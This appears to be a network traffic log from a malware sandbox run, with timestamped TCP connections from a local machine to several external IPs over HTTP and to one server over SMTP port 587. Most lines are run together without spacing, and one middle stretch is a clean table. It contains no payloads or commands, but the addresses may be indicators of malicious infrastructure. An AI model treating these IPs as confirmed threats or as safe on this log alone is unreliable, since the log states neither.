                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.146908045 CET4983180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.267582893 CET804983154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.386833906 CET4983380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.507288933 CET804983318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.508841991 CET4983380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.508841991 CET4983380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.508841991 CET4983380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.629548073 CET804983318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.629560947 CET804983318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.633460045 CET804983318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.633691072 CET4983380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.633723021 CET804983318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.633810997 CET4983380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.753575087 CET804983318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.812071085 CET4983980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.932224989 CET804983954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.933207989 CET4983980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.933401108 CET4983980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.933435917 CET4983980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:05.053436995 CET804983954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:05.053457022 CET804983954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:06.193468094 CET49845587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:06.313842058 CET5874984551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:06.313952923 CET49845587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:12.403338909 CET49845587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:12.625603914 CET49845587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:12.745651960 CET5874984551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.038357973 CET5874984551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.038892031 CET49845587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.039966106 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.160021067 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.160192966 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.220674038 CET804986018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.220761061 CET804986018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.220846891 CET4986080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.221250057 CET4986080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.341653109 CET804986018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.692965984 CET4986780192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.813203096 CET804986782.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.813285112 CET4986780192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.813477993 CET4986780192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.813507080 CET4986780192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.934885025 CET804986782.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.935226917 CET804986782.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.420069933 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.421716928 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.460916996 CET804981482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.460990906 CET4981480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.461034060 CET4981480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.477787971 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.543627024 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.581001043 CET804981482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.597738028 CET804987182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.600244045 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.600614071 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.600627899 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.720550060 CET804987182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.720712900 CET804987182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.843146086 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.843337059 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.964976072 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.261038065 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.261497021 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.383008957 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.680841923 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.680923939 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.680942059 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.680983067 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.682689905 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.802634954 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.097269058 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.098226070 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.220623016 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.510797977 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.511070967 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.630983114 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.923451900 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.923718929 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.043679953 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.342530966 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.342761040 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.463016987 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.755736113 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.756134033 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.876084089 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.173388004 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.177989006 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.298264980 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.590992928 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.616715908 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.616797924 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.616822958 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.616987944 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.406873941 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.406913042 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.526957035 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.526968956 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.506834984 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.506942034 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.506995916 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.507039070 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.627088070 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.259653091 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.379697084 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.379817963 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.380004883 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.380026102 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.500049114 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.500092983 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529479980 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529511929 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529650927 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529733896 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.651294947 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.393881083 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.513914108 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.514044046 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.514348030 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.514395952 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.634279013 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.634345055 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633343935 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633388042 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633508921 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633549929 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.754807949 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.012466908 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.132673025 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.132925987 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.133096933 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.133124113 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.252984047 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.253011942 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.303225040 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.303309917 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.303369045 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.335805893 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.423448086 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.455883980 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.456005096 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.456195116 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.456231117 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.576458931 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.576476097 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.632416964 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.632517099 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.633040905 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.753843069 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.218116999 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.338105917 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.338403940 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.353823900 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.353823900 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.474173069 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.474211931 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.237113953 CET805000182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.237195015 CET5000180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.237320900 CET5000180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.357270956 CET805000182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.445760965 CET5001680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.568036079 CET805001647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.568237066 CET5001680192.168.2.1047.129.31.212
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 26, 2024 08:14:39.569245100 CET  50016        80         192.168.2.10    47.129.31.212
Nov 26, 2024 08:14:39.569339037 CET  50016        80         192.168.2.10    47.129.31.212
Nov 26, 2024 08:14:39.690512896 CET  80           50016      47.129.31.212   192.168.2.10
Nov 26, 2024 08:14:39.690525055 CET  80           50016      47.129.31.212   192.168.2.10
Nov 26, 2024 08:14:39.765475988 CET  80           50015      34.246.200.160  192.168.2.10
Nov 26, 2024 08:14:39.765511036 CET  80           50015      34.246.200.160  192.168.2.10
Nov 26, 2024 08:14:39.765609980 CET  50015        80         192.168.2.10    34.246.200.160
Nov 26, 2024 08:14:39.766093969 CET  50015        80         192.168.2.10    34.246.200.160
Nov 26, 2024 08:14:39.886219978 CET  80           50015      34.246.200.160  192.168.2.10
Nov 26, 2024 08:14:40.322447062 CET  50017        80         192.168.2.10    18.208.156.248
Nov 26, 2024 08:14:40.442652941 CET  80           50017      18.208.156.248  192.168.2.10
Nov 26, 2024 08:14:40.443042040 CET  50017        80         192.168.2.10    18.208.156.248
Nov 26, 2024 08:14:40.443382025 CET  50017        80         192.168.2.10    18.208.156.248
Nov 26, 2024 08:14:40.443382025 CET  50017        80         192.168.2.10    18.208.156.248
Nov 26, 2024 08:14:40.563389063 CET  80           50017      18.208.156.248  192.168.2.10
Nov 26, 2024 08:14:40.563406944 CET  80           50017      18.208.156.248  192.168.2.10
Nov 26, 2024 08:14:41.603873968 CET  80           50017      18.208.156.248  192.168.2.10
Nov 26, 2024 08:14:41.603940010 CET  80           50017      18.208.156.248  192.168.2.10
Nov 26, 2024 08:14:41.604039907 CET  50017        80         192.168.2.10    18.208.156.248
Nov 26, 2024 08:14:41.612312078 CET  50017        80         192.168.2.10    18.208.156.248
Nov 26, 2024 08:14:41.732453108 CET  80           50017      18.208.156.248  192.168.2.10
Nov 26, 2024 08:14:42.204216957 CET  80           50016      47.129.31.212   192.168.2.10
Nov 26, 2024 08:14:42.204278946 CET  80           50016      47.129.31.212   192.168.2.10
Nov 26, 2024 08:14:42.204375982 CET  50016        80         192.168.2.10    47.129.31.212
Nov 26, 2024 08:14:42.204508066 CET  50016        80         192.168.2.10    47.129.31.212
Nov 26, 2024 08:14:42.324768066 CET  80           50016      47.129.31.212   192.168.2.10
Nov 26, 2024 08:14:42.371768951 CET  50018        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:42.491779089 CET  80           50018      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:42.491892099 CET  50018        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:42.492192984 CET  50018        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:42.492223024 CET  50018        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:42.521037102 CET  50019        80         192.168.2.10    208.100.26.245
Nov 26, 2024 08:14:42.612854958 CET  80           50018      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:42.612878084 CET  80           50018      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:42.641344070 CET  80           50019      208.100.26.245  192.168.2.10
Nov 26, 2024 08:14:42.642097950 CET  50019        80         192.168.2.10    208.100.26.245
Nov 26, 2024 08:14:42.642379045 CET  50019        80         192.168.2.10    208.100.26.245
Nov 26, 2024 08:14:42.642451048 CET  50019        80         192.168.2.10    208.100.26.245
Nov 26, 2024 08:14:42.762238979 CET  80           50019      208.100.26.245  192.168.2.10
Nov 26, 2024 08:14:42.762306929 CET  80           50019      208.100.26.245  192.168.2.10
Nov 26, 2024 08:14:43.813335896 CET  80           50019      208.100.26.245  192.168.2.10
Nov 26, 2024 08:14:43.825306892 CET  50019        80         192.168.2.10    208.100.26.245
Nov 26, 2024 08:14:43.828644991 CET  50019        80         192.168.2.10    208.100.26.245
Nov 26, 2024 08:14:43.945360899 CET  80           50019      208.100.26.245  192.168.2.10
Nov 26, 2024 08:14:43.948602915 CET  80           50019      208.100.26.245  192.168.2.10
Nov 26, 2024 08:14:44.236932039 CET  80           50019      208.100.26.245  192.168.2.10
Nov 26, 2024 08:14:44.388012886 CET  50019        80         192.168.2.10    208.100.26.245
Nov 26, 2024 08:14:44.550344944 CET  80           50018      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:44.550403118 CET  80           50018      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:44.550631046 CET  50018        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:44.550705910 CET  50018        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:44.673882008 CET  80           50018      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:44.739852905 CET  50020        80         192.168.2.10    44.221.84.105
Nov 26, 2024 08:14:44.814062119 CET  50021        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:44.860591888 CET  80           50020      44.221.84.105   192.168.2.10
Nov 26, 2024 08:14:44.860681057 CET  50020        80         192.168.2.10    44.221.84.105
Nov 26, 2024 08:14:44.864065886 CET  50020        80         192.168.2.10    44.221.84.105
Nov 26, 2024 08:14:44.864085913 CET  50020        80         192.168.2.10    44.221.84.105
Nov 26, 2024 08:14:44.934190035 CET  80           50021      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:44.934279919 CET  50021        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:44.934489965 CET  50021        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:44.934520960 CET  50021        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:44.984055042 CET  80           50020      44.221.84.105   192.168.2.10
Nov 26, 2024 08:14:44.984061003 CET  80           50020      44.221.84.105   192.168.2.10
Nov 26, 2024 08:14:45.054425001 CET  80           50021      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:45.054440975 CET  80           50021      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:46.005590916 CET  80           50020      44.221.84.105   192.168.2.10
Nov 26, 2024 08:14:46.005611897 CET  80           50020      44.221.84.105   192.168.2.10
Nov 26, 2024 08:14:46.005677938 CET  50020        80         192.168.2.10    44.221.84.105
Nov 26, 2024 08:14:46.009273052 CET  50020        80         192.168.2.10    44.221.84.105
Nov 26, 2024 08:14:46.129235983 CET  80           50020      44.221.84.105   192.168.2.10
Nov 26, 2024 08:14:46.202945948 CET  50022        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:14:46.216257095 CET  49866        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:14:46.322957039 CET  80           50022      18.141.10.107   192.168.2.10
Nov 26, 2024 08:14:46.323117018 CET  50022        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:14:46.323909044 CET  50022        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:14:46.323945999 CET  50022        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:14:46.337053061 CET  587          49866      51.195.88.199   192.168.2.10
Nov 26, 2024 08:14:46.444122076 CET  80           50022      18.141.10.107   192.168.2.10
Nov 26, 2024 08:14:46.444128990 CET  80           50022      18.141.10.107   192.168.2.10
Nov 26, 2024 08:14:46.628855944 CET  587          49866      51.195.88.199   192.168.2.10
Nov 26, 2024 08:14:46.629656076 CET  49866        587        192.168.2.10    51.195.88.199
Nov 26, 2024 08:14:46.995250940 CET  80           50021      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:46.995343924 CET  80           50021      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:46.995501995 CET  50021        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:46.995584965 CET  50021        80         192.168.2.10    13.251.16.150
Nov 26, 2024 08:14:47.115655899 CET  80           50021      13.251.16.150   192.168.2.10
Nov 26, 2024 08:14:47.928133965 CET  50023        80         192.168.2.10    44.221.84.105
Nov 26, 2024 08:14:48.048237085 CET  80           50023      44.221.84.105   192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.049587965 CET5002380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.184844017 CET5002380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.184886932 CET5002380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.304907084 CET805002344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.304917097 CET805002344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.447369099 CET805002218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.447380066 CET805002218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.447443962 CET5002280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.448090076 CET5002280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.568753958 CET805002218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.637145042 CET5002480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.757817984 CET8050024172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.759977102 CET5002480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.762531996 CET5002480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.762635946 CET5002480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.882558107 CET8050024172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.882632971 CET8050024172.234.222.138192.168.2.10
